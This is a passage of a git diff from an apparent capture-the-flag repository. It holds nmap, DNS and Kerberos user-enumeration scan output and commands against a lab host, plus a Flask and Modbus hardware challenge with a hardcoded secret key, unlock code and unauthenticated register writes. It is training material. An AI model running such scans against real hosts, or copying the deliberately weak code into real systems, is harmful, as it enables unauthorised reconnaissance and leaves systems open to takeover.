http://10.129.243.131/script.js +200 GET 215l 294w 3166c http://10.129.243.131/style.css +200 GET 41l 66w 1034c http://10.129.243.131/ +200 GET 41l 66w 1034c http://10.129.243.131/Index.html +200 GET 8l 168w 1092c http://10.129.243.131/LICENSE.txt +200 GET 1l 14w 116c http://10.129.243.131/Search.php +200 GET 41l 66w 1034c http://10.129.243.131/index.html +200 GET 8l 168w 1092c http://10.129.243.131/license.txt +200 GET 1l 14w 116c http://10.129.243.131/search.php +200 GET 8l 168w 1092c http://10.129.243.131/License.txt +200 GET 1l 14w 116c http://10.129.243.131/SEARCH.php +200 GET 41l 66w 1034c http://10.129.243.131/INDEX.html diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_megacorp.htb_vhosts_subdomains-top1million-110000.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_megacorp.htb_vhosts_subdomains-top1million-110000.txt new file mode 100644 index 00000000..e69de29b diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt new file mode 100644 index 00000000..0d915fe8 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt @@ -0,0 +1,106 @@ +# Nmap 7.93 scan initiated Sat Oct 28 14:27:53 2023 as: nmap -vv --reason -Pn -T4 -sV -p 80 "--script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/xml/tcp_80_http_nmap.xml 10.129.243.131 +Nmap scan report for megacorp.htb (10.129.243.131) +Host is up, received user-set (0.033s latency). +Scanned at 2023-10-28 14:27:58 CEST for 128s + +Bug in http-security-headers: no string output. +PORT STATE SERVICE REASON VERSION +80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0 +| http-headers: +| Content-Length: 1034 +| Content-Type: text/html +| Last-Modified: Fri, 20 Aug 2021 13:39:48 GMT +| Accept-Ranges: bytes +| ETag: "0eaf6d7c895d71:0" +| Server: Microsoft-IIS/10.0 +| Date: Sat, 28 Oct 2023 13:05:55 GMT +| Connection: close +| +|_ (Request type: HEAD) +|_http-config-backup: ERROR: Script execution failed (use -d to debug) +|_http-server-header: Microsoft-IIS/10.0 +|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit= for deeper analysis) +|_http-stored-xss: Couldn't find any stored XSS vulnerabilities. +| http-php-version: Logo query returned unknown hash a38e7a4db6688b811d52e1eab13a9b5c +|_Credits query returned unknown hash a38e7a4db6688b811d52e1eab13a9b5c +| http-methods: +| Supported Methods: OPTIONS TRACE GET HEAD POST +|_ Potentially risky methods: TRACE +|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable +| http-comments-displayer: +| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=megacorp.htb +| +| Path: http://megacorp.htb:80/style.css +| Line number: 117 +| Comment: +| /* +| The following are styles purely for the surroundings +| */ +| +| Path: http://megacorp.htb:80/ +| Line number: 11 +| Comment: +| +| +| Path: http://megacorp.htb:80/ +| Line number: 37 +| Comment: +| +| +| Path: http://megacorp.htb:80/style.css +| Line number: 1 +| Comment: +|_ /* this declares a better box model */ +|_http-fetch: Please enter the complete path of the directory to save data in. +|_http-errors: Couldn't find any error pages. +|_http-mobileversion-checker: No mobile version detected. +| http-vhosts: +|_128 names had status 200 +|_http-dombased-xss: Couldn't find any DOM based XSS. +|_http-jsonp-detection: Couldn't find any JSONP endpoints. +| http-sitemap-generator: +| Directory structure: +| / +| Other: 1; css: 1; js: 1 +| Longest directory structure: +| Depth: 0 +| Dir: / +| Total files found (by extension): +|_ Other: 1; css: 1; js: 1 +| http-useragent-tester: +| Status for browser useragent: 200 +| Allowed User Agents: +| Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) +| libwww +| lwp-trivial +| libcurl-agent/1.0 +| PHP/ +| Python-urllib/2.5 +| GT::WWW +| Snoopy +| MFC_Tear_Sample +| HTTP::Lite +| PHPCrawl +| URI::Fetch +| Zend_Http_Client +| http client +| PECL::HTTP +| Wget/1.13.4 (linux-gnu) +|_ WWW-Mechanize/1.34 +|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number= for deeper analysis) +|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages. +| http-referer-checker: +| Spidering limited to: maxpagecount=30 +|_ https://cdnjs.cloudflare.com:443/ajax/libs/prefixfree/1.0.7/prefixfree.min.js +|_http-feed: Couldn't find any feeds. +|_http-csrf: Couldn't find any CSRF vulnerabilities. +|_http-chrono: Request times for /; avg: 159.55ms; min: 156.41ms; max: 162.52ms +|_http-date: Sat, 28 Oct 2023 13:05:55 GMT; +37m49s from local time. +|_http-title: Slandovia Energy +|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php +|_http-malware-host: Host appears to be clean +Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 14:30:06 2023 -- 1 IP address (1 host up) scanned in 133.76 seconds diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_screenshot.png b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_screenshot.png new file mode 100644 index 00000000..6a3a2fd8 Binary files /dev/null and b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_screenshot.png differ diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_whatweb.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_whatweb.txt new file mode 100644 index 00000000..7d343de9 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_whatweb.txt @@ -0,0 +1,46 @@ +WhatWeb report for http://10.129.243.131:80 +Status : 200 OK +Title : Slandovia Energy +IP : 10.129.243.131 +Country : RESERVED, ZZ + +Summary : HTML5, HTTPServer[Microsoft-IIS/10.0], Microsoft-IIS[10.0], Script + +Detected Plugins: +[ HTML5 ] + HTML version 5, detected by the doctype declaration + + +[ HTTPServer ] + HTTP server header string. This plugin also attempts to + identify the operating system from the server header. + + String : Microsoft-IIS/10.0 (from server string) + +[ Microsoft-IIS ] + Microsoft Internet Information Services (IIS) for Windows + Server is a flexible, secure and easy-to-manage Web server + for hosting anything on the Web. From media streaming to + web application hosting, IIS's scalable and open + architecture is ready to handle the most demanding tasks. + + Version : 10.0 + Website : http://www.iis.net/ + +[ Script ] + This plugin detects instances of script HTML elements and + returns the script language/type. + + +HTTP Headers: + HTTP/1.1 200 OK + Content-Type: text/html + Last-Modified: Fri, 20 Aug 2021 13:39:48 GMT + Accept-Ranges: bytes + ETag: "0eaf6d7c895d71:0" + Server: Microsoft-IIS/10.0 + Date: Sat, 28 Oct 2023 13:05:55 GMT + Connection: close + Content-Length: 1034 + + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/xml/tcp_80_http_nmap.xml b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/xml/tcp_80_http_nmap.xml new file mode 100644 index 00000000..2c936110 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/xml/tcp_80_http_nmap.xml @@ -0,0 +1,81 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + +cpe:/a:microsoft:internet_information_services:10.0cpe:/o:microsoft:windows + + + + + + + + + + + + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_nmap.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_nmap.txt new file mode 100644 index 00000000..787dc686 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_nmap.txt @@ -0,0 +1,27 @@ +# Nmap 7.93 scan initiated Sat Oct 28 14:53:13 2023 as: nmap -vv --reason -Pn -T4 -sU -sV -p 53 "--script=banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/xml/udp_53_dns_nmap.xml 10.129.243.131 +Nmap scan report for megacorp.htb (10.129.243.131) +Host is up, received user-set (0.065s latency). +Scanned at 2023-10-28 14:53:15 CEST for 36s + +PORT STATE SERVICE REASON VERSION +53/udp open domain udp-response ttl 127 (generic dns response: SERVFAIL) +| fingerprint-strings: +| NBTStat: +|_ CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +|_dns-cache-snoop: 0 of 100 tested domains are cached. +| dns-nsec-enum: +|_ No NSEC records found +| dns-nsec3-enum: +|_ DNSSEC NSEC3 not supported +1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : +SF-Port53-UDP:V=7.93%I=7%D=10/28%Time=653D044F%P=x86_64-pc-linux-gnu%r(NBT +SF:Stat,32,"\x80\xf0\x80\x82\0\x01\0\0\0\0\0\0\x20CKAAAAAAAAAAAAAAAAAAAAAA +SF:AAAAAAAA\0\0!\0\x01"); + +Host script results: +| dns-brute: +|_ DNS Brute-force hostnames: No results. + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 14:53:51 2023 -- 1 IP address (1 host up) scanned in 37.94 seconds diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_reverse-lookup.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_reverse-lookup.txt new file mode 100644 index 00000000..f4665c79 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_reverse-lookup.txt @@ -0,0 +1,19 @@ +;; communications error to 10.129.243.131#53: timed out + +; <<>> DiG 9.18.11-2-Debian <<>> -p 53 -x 10.129.243.131 @10.129.243.131 +;; global options: +cmd +;; Got answer: +;; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 35295 +;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1 + +;; OPT PSEUDOSECTION: +; EDNS: version: 0, flags:; udp: 4000 +;; QUESTION SECTION: +;131.243.129.10.in-addr.arpa. IN PTR + +;; Query time: 4543 msec +;; SERVER: 10.129.243.131#53(10.129.243.131) (UDP) +;; WHEN: Sat Oct 28 14:53:23 CEST 2023 +;; MSG SIZE rcvd: 56 + + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_zone-transfer-domain.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_zone-transfer-domain.txt new file mode 100644 index 00000000..a1f9cc44 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_zone-transfer-domain.txt @@ -0,0 +1,6 @@ + +; <<>> DiG 9.18.11-2-Debian <<>> AXFR -p 53 @10.129.243.131 megacorp.htb +; (1 server found) +;; global options: +cmd +; Transfer failed. + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_zone-transfer.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_zone-transfer.txt new file mode 100644 index 00000000..76501b7e --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_zone-transfer.txt @@ -0,0 +1,11 @@ +;; communications error to 10.129.243.131#53: timed out + +; <<>> DiG 9.18.11-2-Debian <<>> AXFR -p 53 @10.129.243.131 +; (1 server found) +;; global options: +cmd +;; Query time: 4127 msec +;; SERVER: 10.129.243.131#53(10.129.243.131) (UDP) +;; WHEN: Sat Oct 28 14:53:23 CEST 2023 +;; MSG SIZE rcvd: 28 + + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dnsrecon_default.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dnsrecon_default.txt new file mode 100644 index 00000000..9fef9243 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dnsrecon_default.txt @@ -0,0 +1,3 @@ +[*] std: Performing General Enumeration against: megacorp.htb... +[-] Could not resolve domain: megacorp.htb + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_megacorp.htb_subdomains_subdomains-top1million-110000.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_megacorp.htb_subdomains_subdomains-top1million-110000.txt new file mode 100644 index 00000000..e69de29b diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/xml/udp_53_dns_nmap.xml b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/xml/udp_53_dns_nmap.xml new file mode 100644 index 00000000..d0a60aca --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/xml/udp_53_dns_nmap.xml @@ -0,0 +1,45 @@ + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + + + + + + + + + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp88/udp_88_kerberos_nmap.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp88/udp_88_kerberos_nmap.txt new file mode 100644 index 00000000..99e51cb0 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp88/udp_88_kerberos_nmap.txt @@ -0,0 +1,12 @@ +# Nmap 7.93 scan initiated Sat Oct 28 14:53:13 2023 as: nmap -vv --reason -Pn -T4 -sU -sV -p 88 --script=banner,krb5-enum-users --script-args krb5-enum-users.realm=megacorp.htb,userdb=/usr/share/seclists/Usernames/top-usernames-shortlist.txt -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp88/udp_88_kerberos_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp88/xml/udp_88_kerberos_nmap.xml 10.129.243.131 +Nmap scan report for megacorp.htb (10.129.243.131) +Host is up, received user-set. +Scanned at 2023-10-28 14:53:15 CEST for 6s + +PORT STATE SERVICE REASON VERSION +88/udp open kerberos-sec udp-response Microsoft Windows Kerberos (server time: 2023-10-28 12:53:21Z) +Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 14:53:21 2023 -- 1 IP address (1 host up) scanned in 7.62 seconds diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp88/xml/udp_88_kerberos_nmap.xml b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp88/xml/udp_88_kerberos_nmap.xml new file mode 100644 index 00000000..9bbdef4f --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp88/xml/udp_88_kerberos_nmap.xml @@ -0,0 +1,35 @@ + + + + + + + + + + + + + + + + + + + + + +
+ + + +cpe:/a:microsoft:kerberoscpe:/o:microsoft:windows + + + + + + + + + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml new file mode 100644 index 00000000..c796df89 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml @@ -0,0 +1,103 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + +cpe:/a:jh_software:simple_dns_pluscpe:/o:microsoft:windows +cpe:/a:microsoft:internet_information_services:10.0cpe:/o:microsoft:windows +cpe:/a:microsoft:kerberoscpe:/o:microsoft:windows +cpe:/o:microsoft:windows +cpe:/o:microsoft:windows +cpe:/o:microsoft:windows + + +cpe:/o:microsoft:windows + +cpe:/o:microsoft:windows + +cpe:/o:microsoft:windows +cpe:/o:microsoft:windows +cpe:/o:microsoft:windows +cpe:/o:microsoft:windows +cpe:/o:microsoft:windows +cpe:/o:microsoft:windows + + + + + + + + + + + + + + + + + + + + + + + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml new file mode 100644 index 00000000..2ccbe517 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml @@ -0,0 +1,92 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + + +cpe:/a:microsoft:internet_information_services:10.0cpe:/o:microsoft:windows +cpe:/a:microsoft:kerberoscpe:/o:microsoft:windows +cpe:/o:microsoft:windows +cpe:/o:microsoft:windows +cpe:/o:microsoft:windows + + +cpe:/o:microsoft:windows + +cpe:/o:microsoft:windows + + + + + + + + + + +cpe:/a:microsoft:kerberoscpe:/o:microsoft:windows + + + + + + + + + + + + + + + + + + + + diff --git a/LaokoonHaxorcist/fullpwn/search.req b/LaokoonHaxorcist/fullpwn/search.req new file mode 100644 index 00000000..616e57a9 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/search.req @@ -0,0 +1,13 @@ +POST /search.php HTTP/1.1 +Host: 10.129.243.131 +Content-Length: 9 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 +Content-Type: application/x-www-form-urlencoded;charset=UTF-8 +Accept: */* +Origin: http://10.129.243.131 +Referer: http://10.129.243.131/ +Accept-Encoding: gzip, deflate +Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7 +Connection: close + +query=abc \ No newline at end of file diff --git a/LaokoonHaxorcist/fullpwn/users.txt b/LaokoonHaxorcist/fullpwn/users.txt new file mode 100644 index 00000000..db28c087 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/users.txt @@ -0,0 +1,3 @@ +Administrator +Admin +Guest diff --git a/LaokoonHaxorcist/hw_invasion/hw_invasion/Dockerfile b/LaokoonHaxorcist/hw_invasion/hw_invasion/Dockerfile new file mode 100644 index 00000000..a13dc719 --- /dev/null +++ b/LaokoonHaxorcist/hw_invasion/hw_invasion/Dockerfile @@ -0,0 +1,21 @@ +FROM ubuntu:latest + +RUN apt-get update --fix-missing && apt-get -y upgrade +RUN apt-get install -y python3 python3-pip supervisor +RUN pip3 install flask flask_httpauth umodbus + +# Setup app +RUN mkdir -p /app + +# Copy challenge +COPY challenge/ /app + +# Setup supervisor +COPY config/supervisord.conf /etc/supervisord.conf + +# Expose the port the challenge is reachable on +EXPOSE 80 502 + +# Run supervisord +CMD ["/usr/bin/supervisord", "-c", "/etc/supervisord.conf"] + diff --git a/LaokoonHaxorcist/hw_invasion/hw_invasion/build_docker.sh b/LaokoonHaxorcist/hw_invasion/hw_invasion/build_docker.sh new file mode 100755 index 00000000..00526627 --- /dev/null +++ b/LaokoonHaxorcist/hw_invasion/hw_invasion/build_docker.sh @@ -0,0 +1,4 @@ +#!/bin/bash +docker rm -f invasion +docker build --tag=invasion . && \ +docker run -p 80:80 -p 502:502 --rm --name=invasion invasion diff --git a/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/app.py b/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/app.py new file mode 100644 index 00000000..7a9bdc37 --- /dev/null +++ b/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/app.py @@ -0,0 +1,104 @@ +from flask import * +from os import path +import random +from flask_httpauth import HTTPBasicAuth +from werkzeug.security import generate_password_hash, check_password_hash + +app = Flask(__name__) +app.secret_key = '45de23-dc231-54569-342da' +SCRIPT_TEMPLATE = """ + +""" + +HTML_TEMPLATE = """ +


+PassCode: + +
+""" +def sess_init(): + session['granted']=False + +auth = HTTPBasicAuth() +users = { + "admin": generate_password_hash("") +} + +@auth.verify_password +def verify_password(username, password): + if username in users and \ + check_password_hash(users.get(username), password): + return username + +@app.route("/") +@auth.login_required +def index(): + if not session: + sess_init() + return render_template('index.html',tmpl=SCRIPT_TEMPLATE%('0000000000')) + +@app.route("/access",methods=["GET","POST"]) +@auth.login_required +def access(): + if request.method == 'POST': + serial = request.values.get('unlock_code') + if serial=='44219054768211203764': + session['granted']=True + return render_template('index.html',tmpl=SCRIPT_TEMPLATE%('ENABLED')) + else: + return render_template('index.html',tmpl=SCRIPT_TEMPLATE%('FAILED'),fm=HTML_TEMPLATE) + else: + if path.exists('/app/.conf') and not path.exists('/app/.provision'): + return render_template('index.html',tmpl=SCRIPT_TEMPLATE%('ENROLL_ERR')) + if path.exists('/app/.conf') and path.exists('/app/.provision'): + return render_template('index.html',tmpl=SCRIPT_TEMPLATE%('AUTH_ERR'),fm=HTML_TEMPLATE) + else: + return render_template('index.html',tmpl=SCRIPT_TEMPLATE%('DEVICES_OFF')) + +@app.route("/provision") +@auth.login_required +def provision(): + if path.exists('/app/.conf'): + open('/app/.provision','w').write('') + return render_template('index.html',tmpl=SCRIPT_TEMPLATE%('SUCCESS')) + else: + return render_template('index.html',tmpl=SCRIPT_TEMPLATE%('DEVICES_OFF')) + +@app.route("/state") +@auth.login_required +def status(): + if path.exists('/app/.conf'): + return render_template('index.html',tmpl=SCRIPT_TEMPLATE%('DEVICES_ON')) + else: + return render_template('index.html',tmpl=SCRIPT_TEMPLATE%('DEVICES_OFF')) + +@app.route("/power") +@auth.login_required +def power(): + return render_template('index.html',tmpl=SCRIPT_TEMPLATE%('ERROR')) + +@app.route("/rate") +@auth.login_required +def rate(): + if session['granted']: + r = random.randint(1, 10) + return make_response("Gamma Dose Rate : 0.02{}34456{} uR/hr
{}
".format(r,r,'HTB{this_is_a_fake_flag}')) + else: + r = random.randint(100,10000) + return make_response("Gamma Dose Rate : {} uR/hr".format(r)) + +app.run('0.0.0.0',80) diff --git a/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/bot.py b/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/bot.py new file mode 100755 index 00000000..8a334914 --- /dev/null +++ b/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/bot.py @@ -0,0 +1,29 @@ +#!/usr/bin/python3 + +import socket +from os import path +from time import sleep +from umodbus import conf +from umodbus.client import tcp + +conf.SIGNED_VALUES = True + +#Populate coils data to default +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +sock.connect(('127.0.0.1', 502)) +msg = tcp.write_multiple_coils(slave_id=1, starting_address=1, values=[1, 0, 0, 1, 1, 0, 0, 1 ,1]) +tcp.send_message(msg, sock) +sock.close() + +while True: + sleep(2) + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.connect(('127.0.0.1', 502)) + message = tcp.read_coils(starting_address=7, quantity=1, slave_id=1) + out = tcp.send_message(message, sock) + if out[0]==1: #push serial key to the registers + open('app/.conf','w').write('') + if path.exists('app/.provision'): + message = tcp.write_multiple_registers(slave_id=1, starting_address=15, values=[44, 21, 90, 54, 76, 82, 11, 20, 37, 64]) + tcp.send_message(message, sock) + sock.close() diff --git a/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/server.py b/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/server.py new file mode 100755 index 00000000..f40b6c18 --- /dev/null +++ b/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/server.py @@ -0,0 +1,31 @@ +#!/usr/bin/python3 + +import logging +import json +from time import sleep +from socketserver import TCPServer +from collections import defaultdict +from umodbus import conf +from umodbus.server.tcp import RequestHandler, get_server +from umodbus.utils import log_to_stream + +log_to_stream(level=logging.ERROR) +data_store = defaultdict(int) +conf.SIGNED_VALUES = True +TCPServer.allow_reuse_address = True +app = get_server(TCPServer, ('0.0.0.0', 502), RequestHandler) + +@app.route(slave_ids=[1], function_codes=[1,2,3,4], addresses=list(range(1, 30))) +def read_data_store(slave_id, function_code, address): + return data_store[address] + +@app.route(slave_ids=[1], function_codes=[5,6,15,16], addresses=list(range(1, 30))) +def write_data_store(slave_id, function_code, address, value): + data_store[address] = value + +if __name__ == '__main__': + try: + app.serve_forever() + finally: + app.shutdown() + app.server_close() diff --git a/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/static/images/dev.png b/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/static/images/dev.png new file mode 100644 index 00000000..87d3ec57 Binary files /dev/null and b/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/static/images/dev.png differ diff --git a/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/static/js/index.js b/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/static/js/index.js new file mode 100644 index 00000000..f5cd8897 --- /dev/null +++ b/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/static/js/index.js @@ -0,0 +1,10 @@ +!function(t,n){"object"==typeof exports&&"object"==typeof module?module.exports=n():"function"==typeof define&&define.amd?define([],n):"object"==typeof exports?exports.LCD=n():t.LCD=n()}(window,(function(){return function(t){var n={};function r(e){if(n[e])return n[e].exports;var u=n[e]={i:e,l:!1,exports:{}};return t[e].call(u.exports,u,u.exports,r),u.l=!0,u.exports}return r.m=t,r.c=n,r.d=function(t,n,e){r.o(t,n)||Object.defineProperty(t,n,{enumerable:!0,get:e})},r.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})},r.t=function(t,n){if(1&n&&(t=r(t)),8&n)return t;if(4&n&&"object"==typeof t&&t&&t.__esModule)return t;var e=Object.create(null);if(r.r(e),Object.defineProperty(e,"default",{enumerable:!0,value:t}),2&n&&"string"!=typeof t)for(var u in t)r.d(e,u,function(n){return t[n]}.bind(null,u));return e},r.n=function(t){var n=t&&t.__esModule?function(){return t.default}:function(){return t};return r.d(n,"a",n),n},r.o=function(t,n){return Object.prototype.hasOwnProperty.call(t,n)},r.p="./",r(r.s=7)}([function(t,n,r){(function(t,e){var u; +/** + * @license + * Lodash + * Copyright OpenJS Foundation and other contributors + * Released under MIT license + * Based on Underscore.js 1.8.3 + * Copyright Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors + */(function(){var i,o=200,a="Unsupported core-js use. Try https://npms.io/search?q=ponyfill.",c="Expected a function",f="__lodash_hash_undefined__",s=500,l="__lodash_placeholder__",h=1,p=2,v=4,_=1,g=2,d=1,y=2,w=4,b=8,m=16,x=32,j=64,k=128,S=256,A=512,z=30,C="...",I=800,O=16,E=1,R=2,L=1/0,B=9007199254740991,T=17976931348623157e292,W=NaN,M=4294967295,P=M-1,U=M>>>1,D=[["ary",k],["bind",d],["bindKey",y],["curry",b],["curryRight",m],["flip",A],["partial",x],["partialRight",j],["rearg",S]],N="[object Arguments]",$="[object Array]",F="[object AsyncFunction]",q="[object Boolean]",G="[object Date]",V="[object DOMException]",Z="[object Error]",K="[object Function]",H="[object GeneratorFunction]",J="[object Map]",Y="[object Number]",Q="[object Null]",X="[object Object]",tt="[object Proxy]",nt="[object RegExp]",rt="[object Set]",et="[object String]",ut="[object Symbol]",it="[object Undefined]",ot="[object WeakMap]",at="[object WeakSet]",ct="[object ArrayBuffer]",ft="[object DataView]",st="[object Float32Array]",lt="[object Float64Array]",ht="[object Int8Array]",pt="[object Int16Array]",vt="[object Int32Array]",_t="[object Uint8Array]",gt="[object Uint8ClampedArray]",dt="[object Uint16Array]",yt="[object Uint32Array]",wt=/\b__p \+= '';/g,bt=/\b(__p \+=) '' \+/g,mt=/(__e\(.*?\)|\b__t\)) \+\n'';/g,xt=/&(?:amp|lt|gt|quot|#39);/g,jt=/[&<>"']/g,kt=RegExp(xt.source),St=RegExp(jt.source),At=/<%-([\s\S]+?)%>/g,zt=/<%([\s\S]+?)%>/g,Ct=/<%=([\s\S]+?)%>/g,It=/\.|\[(?:[^[\]]*|(["'])(?:(?!\1)[^\\]|\\.)*?\1)\]/,Ot=/^\w*$/,Et=/[^.[\]]+|\[(?:(-?\d+(?:\.\d+)?)|(["'])((?:(?!\2)[^\\]|\\.)*?)\2)\]|(?=(?:\.|\[\])(?:\.|\[\]|$))/g,Rt=/[\\^$.*+?()[\]{}|]/g,Lt=RegExp(Rt.source),Bt=/^\s+|\s+$/g,Tt=/^\s+/,Wt=/\s+$/,Mt=/\{(?:\n\/\* \[wrapped with .+\] \*\/)?\n?/,Pt=/\{\n\/\* \[wrapped with (.+)\] \*/,Ut=/,? & /,Dt=/[^\x00-\x2f\x3a-\x40\x5b-\x60\x7b-\x7f]+/g,Nt=/\\(\\)?/g,$t=/\$\{([^\\}]*(?:\\.[^\\}]*)*)\}/g,Ft=/\w*$/,qt=/^[-+]0x[0-9a-f]+$/i,Gt=/^0b[01]+$/i,Vt=/^\[object 